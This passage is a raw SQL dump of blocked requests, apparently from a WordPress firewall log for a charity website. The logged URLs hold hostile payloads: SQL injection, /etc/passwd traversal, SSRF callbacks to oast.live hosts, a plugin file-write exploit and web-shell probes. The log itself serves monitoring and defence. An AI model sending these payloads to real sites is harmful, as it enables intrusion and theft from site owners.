Safari\\/537.36\"}','yGfuorclhe9gOKFT8Z0XsWdq',0,1674811007.4839,121,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/wp-payeezy-pay/donate.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2919.83 Safari\\/537.36\"}','ZYiCHGoT3y5b7VnUOfph60Ba',0,1674811007.6179,104,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=uploadFontIcon','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2919.83 Safari\\/537.36\"}','usGkCYwVod2n3xaf5j7l4yX8',0,1674811007.6703,87,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','FasWAdr72mhoEgyfTHzK0QZ4',0,1674811007.6720,95,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/ait-csv-import-export/admin/upload-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML like Gecko) Chrome\\/44.0.2403.155 Safari\\/537.36\"}','7DkzmR1BeS0gctGpZ8hAHLCd',0,1674811007.8247,99,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2117.157 Safari\\/537.36\"}','ZArUaIph3QB9Vw5LHt6dlubn',0,1674811007.9308,102,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/simple-file-list/ee-upload-engine.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','rHIAWbQ016tGyeKVnfFgLwp7',0,1674811007.9308,104,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','PN3EFmiqIZfJUj8Tb0lyY9kt',0,1674811007.9308,114,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-comments-post.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2656.18 Safari\\/537.36\"}','jmGCR9ntXBazrTV0YN5u7lUW',0,1674811007.9332,121,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','MzF3LUn1NHK8vVAcJfXkPjgD',0,1674811008.1145,93,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin.php?page=html2wp-settings','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1944.0 Safari\\/537.36\"}','94jWlYTNRdJguFh1XpPw2x5f',0,1674811008.3546,120,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/options-general.php?page=smartcode','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1944.0 Safari\\/537.36\"}','trgkKN5Omuhw7MAzsJI2UCdE',0,1674811008.3842,111,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=ajax_get&clinic_id={\"id\":\"1\"}&props_doctor_id=1%2c2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b&route_name=get_doctor_details','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','KT5jx0ZOAN24mtEiVo1fBcv9',0,1674811008.3886,141,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\",\"2\":\"https:\\/\\/www.equalitywalk.org.uk:443\\/favicon.ico\"}','9arJ8UovX7mgklI6DAOdjpeR',0,1674811008.6357,113,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2820.59 Safari\\/537.36\"}','kEVlp3L1Q2FyIOajgsSe5Wqr',0,1674811008.9356,115,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','nvckxYZBRFhKpJIuWQOe46SU',0,1674811009.0107,137,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd','','{\"1\":\"Mozilla\\/5.0 (Windows NT 4.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','yA8LDdUXoxvqnlVtQrRcWOBM',0,1674811009.0107,148,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/imagements/images/2ku4bdhjoiumwkqwfpfrmsv9tsx.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 Safari\\/537.36\"}','jiA9nbko1TYtE6QVHU0wrMLK',0,1674811009.1739,172,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','I98jz0u5BZTPgEYQS3Devbh1',0,1674811009.1844,162,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/simple-file-list/ee-file-engine.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','HxcU3v2XSmdr4j9BFI5AKb81',0,1674811009.1700,176,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/?item_id=0+union+select+sleep(5)+--+g&rest_route=/wc/v3/wishlist/remove_product/1','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2820.59 Safari\\/537.36\"}','QZfml8MONKkYuxtGwD9peIjB',0,1674811009.3513,404,'','GET',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/uploads/kaswara/fonts_icon/fndbsk/ub.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','cv6bgdDYyWTHaGx9LhQtm1i2',0,1674811009.3515,403,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=joomsport_md_load','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 Safari\\/537.36\"}','kQK9XWIVJEfZDUm2Bp5MNhiC',0,1674811009.2067,548,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','Gwi2tLWnTfOKJk1pgcV0dq7y',0,1674811009.7309,189,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/uploads/html2wp/2Ku4B4hf4iboR6EaOCsyCh7jeuo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','18xaNzqM4rHnJZy2QWBvc3tb',0,1674811009.7879,176,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/index.php?rest_route=/xs-donate-form/payment-redirect/3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML like Gecko) Chrome\\/44.0.2403.155 Safari\\/537.36\"}','SOFtfEnmId95ZKReqNH4srgX',0,1674811010.1034,148,'','GET',403,0,520,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/?pid=0&uid=0&url=test&visitorId=1331\'+and+sleep(5)+or+\'&wmcAction=wmcTrack','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2820.59 Safari\\/537.36\"}','Skhb3CVjRd1Pqw8H7zNXyxKc',0,1674811010.1034,150,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','62fNJmDraU8zdRElBWKkpcG1',0,1674811010.1034,171,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/wpcargo/includes/barcode.php?filepath=2Ku4BMPEU9vxWl4lJDd8hHB8mSB.php&size=1&sizefactor=.090909090909&text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','vpE1n9AYbOfw74QyDG2NB8cq',0,1674811010.2669,290,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2762.73 Safari\\/537.36\"}','wVmQXWBqei4172CSjbf5xv0R',0,1674811010.2669,322,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/uploads/simple-file-list/nuclei.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','EtLnwlPrM0xG6YIVzvWQRN9b',0,1674811010.3813,241,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://cf9pcuq9k8i2u5o00010bpyizea99se48.oast.live','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/40.0.2214.93 Safari\\/537.36\"}','2wI1enoOBzVxXk4YMA6dRjcH',0,1674811010.5908,205,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-json/visualizer/v1/upload-data','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1866.237 Safari\\/537.36\"}','AXjKJRgdLt92qcbHUWhfeiEC',0,1674811010.6011,228,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=moove_read_xml','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','vwZGKdh37bBymMuVXtC4koHO',0,1674811010.6055,256,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/?qtproxycall=http://cf9pcuq9k8i2u5o00010e7rrga1ckii68.oast.live','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','xnl0FDwdJQz3f4NAKp7UrLOu',0,1674811010.6206,269,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/wpcargo/includes/2Ku4BMPEU9vxWl4lJDd8hHB8mSB.php?1=var_dump','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','xSPI7yuDA8OrihJRFnj3K12Q',0,1674811010.7540,182,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=easync_success_and_save','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','TPAsHYjROrvKhD4Iwuifmpg5',0,1674811010.7629,184,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-post.php?vrc_cmd=phpinfo','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','rc1JUa7EMqD2jK93LSg5FIBR',0,1674811010.8111,184,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/uploads/2Ku4Bs7seuOB4gM1g8xYpVu0nIQ.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1866.237 Safari\\/537.36\"}','ktJaWM9Qw7HUyFx260pKRls8',0,1674811010.7050,301,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','RTW80LyPl5siEQKdXDAre4Om',0,1674811010.7541,274,'','POST',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn)','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','z9gQCZdhcjIUSuwYoxlJ8EW0',0,1674811010.9465,174,'','GET',403,0,700,0,1,'',0),('185.65.134.166',3108079270,'','https://www.equalitywalk.org.uk/favicon.ico/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','bo52fD74EBNQgUnp8Hmz9Sdx',0,1674811011.7778,152,'','GET',403,0,700,0,1,'',0),('82.223.19.142',1390351246,'','https://www.equalitywalk.org.uk/wso112233.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9YwmCOVEQzpSuc7Gy0TRhAPo',0,1674833891.1014,138,'','GET',403,0,700,0,1,'',0),('82.223.19.142',1390351246,'','https://www.equalitywalk.org.uk/bala.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','aTCqHMwP3OWcmz0tb7jfpI6G',0,1674833900.2578,168,'','GET',403,0,700,0,1,'',0),('82.223.19.142',1390351246,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','FpLvcMHo9JeiY72BgujCGxaR',0,1674833915.3057,104,'','GET',403,0,700,0,1,'',0),('82.223.19.142',1390351246,'','https://www.equalitywalk.org.uk/xleet-shell.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','WLp6HSGCVQjoK5EUzYq8nRd2',0,1674833924.4014,127,'','GET',403,0,700,0,1,'',0),('82.223.19.142',1390351246,'','https://www.equalitywalk.org.uk/wp-admin/xleet-shell.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7qMjxWlwEBNzVU8Ab0I49KOL',0,1674833936.9304,116,'','GET',403,0,700,0,1,'',0),('82.223.19.142',1390351246,'','https://www.equalitywalk.org.uk/wso112233.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','xLynpwId6MT5OYrqP7Jm8Hov',0,1674834306.2321,113,'','GET',403,0,700,0,1,'',0),('82.223.19.142',1390351246,'','https://www.equalitywalk.org.uk/bala.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','29L0mqzh6eOMirPZjVglNdAB',0,1674834318.9164,141,'','GET',403,0,700,0,1,'',0),('82.223.19.142',1390351246,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','qykdRsf8JX7FtcY3QWjUvVwr',0,1674834334.1931,163,'','GET',403,0,700,0,1,'',0),('82.223.19.142',1390351246,'','https://www.equalitywalk.org.uk/xleet-shell.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','VfD3B1LkFxogbMpt508SGns2',0,1674834336.8267,143,'','GET',403,0,700,0,1,'',0),('82.223.19.142',1390351246,'','https://www.equalitywalk.org.uk/wp-admin/xleet-shell.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','WyMeVU285Ocr06d9DJ1qhtPL',0,1674834339.3637,110,'','GET',403,0,700,0,1,'',0),('193.202.110.17',3251269137,'','https://equalitywalk.org.uk/wp-includes/wp-readme.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-includes\\/wp-readme.php\"}','wGXfBgthkFpzKAu5x0vJ6Tnm',0,1674837092.9402,158,'','GET',403,0,700,0,1,'',0),('180.150.155.24',3029768984,'','https://equalitywalk.org.uk/wp-admin/wso112233.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/wso112233.php\"}','w9FVTUXAj0OyxNPWmz81fLvl',0,1674837384.8830,138,'','GET',403,0,700,0,1,'',0),('43.154.97.170',731537834,'','https://equalitywalk.org.uk/wp-admin/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/wp-atom.php\"}','rR3WvY60mBzFUXuacfGIM1qi',0,1674846683.1178,146,'','GET',403,0,700,0,1,'',0),('43.154.97.170',731537834,'','https://equalitywalk.org.uk/wp-admin/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/wp-atom.php\"}','dbYs7J1VZyPTcQRWGBzIM3hA',0,1674846686.0625,97,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/files/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','82ieQvnAcZatIE5HRLlps3Th',0,1674850585.0904,124,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/abruzi.php4','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9xTqQOspozf1kPv32uCaNh0Y',0,1674850587.3341,119,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','JfZsF6nlUabwWocQiGSTAOK0',0,1674850587.7274,104,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wp-admin/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','zCorhyjVxLd7Jiwe3N0IZPgl',0,1674850588.1532,98,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wp-admin/adruzi.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','yQGqAjh52VXCUvgSZBtsFRTl',0,1674850589.2884,101,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/xo.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','wGq0gMVa5WZXeFRpHYy2doit',0,1674850593.6149,94,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wp-admin/xo.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','yJ6KfPqxYsW8F2guwNj1kpmb',0,1674850594.0752,140,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wp-admin/king.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','G1ePgco80dDxQNbTh9LMVjIC',0,1674850594.8982,112,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ZVedWDKjxXFrNyHQ06tS8bnI',0,1674850595.8164,100,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wp-class.phpupload.phpwp-content/wp__config.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie 